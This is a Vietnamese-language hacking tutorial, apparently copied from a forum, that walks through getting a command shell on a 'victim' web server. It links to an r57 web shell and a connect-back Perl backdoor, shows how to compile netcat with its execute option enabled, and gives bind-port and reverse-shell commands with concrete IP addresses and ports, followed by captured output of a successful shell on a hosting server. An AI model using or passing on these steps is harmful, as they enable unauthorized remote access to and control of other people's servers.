Lưu ý : Nếu victim có đặt firewall thì cách này ko có tác dụng , chuyển sang xài back-connect.
Trang 11) Netcat for Win32 & *NIX , PuTTy :
Trích:
http://ruthtr.com/uploads/Netcat.zip
Trích:
http://www.tartarus.org/~simon/putty /x86/putty.exe
2) Máy tính nối mạng riêng tại nhà hoặc 1 hosting hỗ trợ SSH (ở đây ĐĐ xài hosting)
3) Đã tham khảo qua bài viết này :
Trích:
http://www.quantrimang.com/view.asp? 1&news_id=7378
4) Một con r57shell hoặc script connect-back bất kì :
Trích:
http://k.1asphost.com/dondoc/dc.pl
Trích:
http://k.1asphost.com/dondoc/r57.php
5) Kiến thức Windows và *NIX
-
Start :
- Install netcat trên hosting :
- Mở file netcat.c chỉnh một số thứ sau :
+ tìm dòng res_init(); trong main() và thêm vào trước 2 dấu / : // res_init();
+ thêm 2 dòng sau vào phần #define (nằm ở đầu file):
#define GAPING_SECURITY_HOLE
#define TELNET
- Up lên host
- Dùng PuTTy kết nối đến = SSH
Trang 2- biên dịch: make linux
- chmod nc 755
- chạy thử: /nc -h
Nếu hiện ra như sau là được :
- Bind Port :
Cái này trong con r57shell đã hỗ trợ sẵn , cách làm tương đối đơn giản Kéo xuống cuối con r57 phần : Bind port to /bin/bash , trong đó :
- Port : bất kỳ port nào bạn thích , ví dụ : 2121
Trang 3- Password for access : pass để quyền truy cập (để mặc định là r57)
- Use : để là Perl
Xong rồi bạn nhấn Bind , sau đó trên máy tính của mình bạn mở Netcat ra và kết
nối đến victim như sau :
Cú pháp :
Trích:
C:\netcat>nc -nvv [ip của victim] 2121
-nvv : dùng ip dạng số và hiển thị thông tin chi tiết về kết nối hiện tại
Ví dụ :
Trích:
C:\netcat>nc -nvv 66.246.215.103 2121
Nếu ok thì ta sẽ nhận được shell lệnh
Lưu ý : Nếu victim có đặt firewall thì cách này ko có tác dụng , chuyển sang xài back-connect
- Back-connect :
Cách 1 :
Vào phần back-connect của con r57 :
- IP : địa chỉ IP của host install netcat ví dụ 216.120.237.150
- Port: bất kì ví dụ 3131
- Use : để mặc định Perl
Dùng PuTTy kết nối đến host = SSH , di chuyển đến thư mục chứa con netcat vừa biên dịch :
Chạy lệnh sau :
Trích:
bash-2.05a$ /nc -l -n -v -p 3131
Quay sang con r57 nhấn Connect , nếu ok thì trên cửa sổ PuTTy sẽ được như sau : Code:
listening on [any] 3131
connect to [216.120.237.150] from (UNKNOWN) [216.118.97.168] 56973
Linux peony.multisite.site5.com 2.6.9-22.0.2.ELsmp #1 SMP Tue Jan 17 07:10:04 CST 2006 i686 i686 i386 GNU/Linux
Trang 4uid=32466(ruth) gid=969(ruth) groups=969(ruth)
xong !
Cách 2 :
Upload file dc.pl ở trên lên host
Dùng con r57 run command như sau :
Cú pháp :
Trang 5Trích:
perl dc.pl [ip] [port]
Ví dụ :
Trích:
perl dc.pl 216.120.237.150 4141
Cửa sổ PuTTy để netcat lắng nghe tại cổng 4141 , nếu ko có gì trở ngại thì ta sẽ được shell lệnh như sau :
Code:
listening on [any] 4141
connect to [216.120.237.150] from (UNKNOWN) [216.118.97.168] 57421
== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE
==
==Systeminfo==
Linux peony.multisite.site5.com 2.6.9-22.0.2.ELsmp #1 SMP Tue Jan 17 07:10:04 CST 2006 i686 i686 i386 GNU/Linux
==Userinfo==
uid=32466(ruth) gid=969(ruth) groups=969(ruth)
==Directory==
/home/ruth/public_html/uploads/test
==Shell==
id
uid=32466(ruth) gid=969(ruth) groups=969(ruth)